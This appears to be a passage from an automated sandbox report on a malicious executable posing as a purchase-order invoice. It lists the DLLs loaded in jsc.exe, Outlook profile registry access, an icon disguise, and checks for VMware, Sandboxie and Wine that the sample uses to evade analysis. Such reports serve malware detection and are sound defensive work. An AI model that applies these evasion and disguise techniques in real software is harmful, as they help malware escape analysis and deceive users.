                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: PO-inv-CQV20(92315).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO-inv-CQV20(92315).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PO-inv-CQV20(92315).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: PO-inv-CQV20(92315).exeStatic PE information: 0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348A53DB push es; iretd 0_2_00007FFD348A53DD
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3497026B push esp; retf 4810h0_2_00007FFD34970312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F0D838 push 3405EFB0h; ret 3_2_05F0D90D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F036D7 push ebx; iretd 3_2_05F036DA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F0D940 push 3405EFB0h; ret 3_2_05F0D90D

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Icon mismatch, binary includes an icon from a different legit application in order to fool users
                      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (51).png
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory allocated: 233452F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeMemory allocated: 2335EC90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: F60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 28E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: Amcache.hve.7.drBinary or memory string: VMware
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: jsc.exe, 00000003.00000002.3311348470.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
